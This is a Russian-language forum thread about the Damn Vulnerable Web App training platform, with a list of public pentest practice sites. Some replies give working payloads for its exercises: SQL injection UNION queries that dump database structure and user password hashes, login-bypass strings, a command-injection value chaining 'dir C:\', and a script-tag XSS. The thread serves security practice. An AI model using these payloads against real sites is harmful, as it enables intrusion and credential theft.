![]() |
Damn Vulnerable Web App. Тренировочная площадка.
Это веб-приложение - тренировочная площадка для испытания и совершенствования своих навыков в поиске и использовании веб-уязвимостей.
Имеет три уровня безопасности(сложности). Поддерживает следующие виды атак: *SQL Injection *XSS (Cross Site Scripting) *LFI (Local File Inclusion) *RFI (Remote File Inclusion) *Command Execution *Upload Script *Login Brute Force *и многие другие.. Для использования необходим вебсервер + база данных MySQL Видео с наиподробнейшим описанием и инструкцией можно посмотреть здесь: http://www.youtube.com/watch?v=GzIj07jt8rM Подробности на оф.сайте: http://www.ethicalhack3r.co.uk/ Скачать dvwa v1.0.4: dvwa v1.0.4: http://sourceforge.net/projects/dvwa |
Если не ошибаюсь это поддельный вебсервер для поиска бага. Вот готовые тест сайты для пентеста и проверки своих навыков:
SPI Dynamics (live) - http://zero.webappsecurity.com/ Cenzic (live) - http://crackme.cenzic.com/ Watchfire (live) - http://demo.testfire.net/ Acunetix (live) - http://testphp.acunetix.com/ http://testasp.acunetix.com http://testaspnet.acunetix.com WebMaven / Buggy Bank - http://www.mavensecurity.com/webmaven Foundstone SASS tools - http://www.foundstone.com/us/resources-free-tools.asp Updated HackmeBank - http://www.o2-ounceopen.com/technica...hacmebank.html OWASP WebGoat - http://www.owasp.org/index.php/OWASP_WebGoat_Project OWASP SiteGenerator - http://www.owasp.org/index.php/Owasp_SiteGenerator Stanford SecuriBench - http://suif.stanford.edu/~livshits/securibench/ SecuriBench Micro - http://suif.stanford.edu/~livshits/work/securibench-micro/ |
ТС, ты бы еще сюда ссылки на игровые образы CTF выложил :) пусть народ потренируется
|
для тех кто пытался проходить...
1) уровень "Low"->Brute force Код:
$user=$_GET['username'];логин: admin'# пароль: можно оставить пустым, так как уязвим только логин. Вопрос: почему не сработало admin'--+ (в качестве тренировочной площадки - денвер) уровень "Medium"->Brute force Код:
$user = $_GET['username']; Вопрос: реально ли обойти mysql_real_escape_string()? или здесь токо брутфорс поможет? |
It's easy
В SQL-Inj на medium: Код:
-1 UNION SELECT 1,2 /* |
Цитата:
|
Цитата:
|
кому интересно - существует ещё Damn Vulnerable Linux :)
damnvulnerablelinux.org |
Цитата:
Цитата:
В Command Execution на Лов лвл, можно юзать дополнительно команды, разделяя их как в Линуксе так и в Винде амперсандами, пример: Цитата:
ЗЫ Доступна версия 1.0.6, давайте не спим делимся опытом, кто что нашел интересного, я только начал. |
Вот как я ломал :)
1.Low SQL-Inj Код:
-1' UNION SELECT concat_ws(0x3A,user(),version(),database()),'ololo sql :D'/*Код:
-1' UNION SELECT table_name,'table' FROM information_schema.tables WHERE table_schema='dvwa'/*Код:
-1' UNION SELECT column_name,'column' FROM information_schema.columns WHERE table_schema='dvwa'/*Код:
-1' UNION SELECT concat_ws(0x3A,user_id,first_name,last_name,user,password,avatar),concat('info about ',first_name,' aka ',user) FROM users/*2. Low Brute Тут 2 пути: 1) Через скулю (это вооонтам наверху) достаем хэши, брутим на hashcracking,gdataonline, md5.rednoise etc, благо пароли слабые 2) Код:
Логин: admin' /*3. Low Command Execution Код:
127.0.0.1 && dir C:\4. Low Upload Код:
No comments aka тупо льемКод:
http://site/fi_content.phpТут видно, что есть связка - LFI и Upload Vuln, берем сканер по хеадерам и сканим известные диры aka up, upload, uploads и находим uploads с прямым листингом :) 6. XSS Код:
</pre><script>alert('xss :D')</script><pre>some HaCkEr7. BONUS: в медиум SQL-Inj: Код:
-1 UNION SELECT concat_ws(0x3A,user(),version(),database()),2/*С последующими уровнями становится больше и больше фильтров, но как говорится на каждый замок - своя отмычка |
| Время: 23:43 |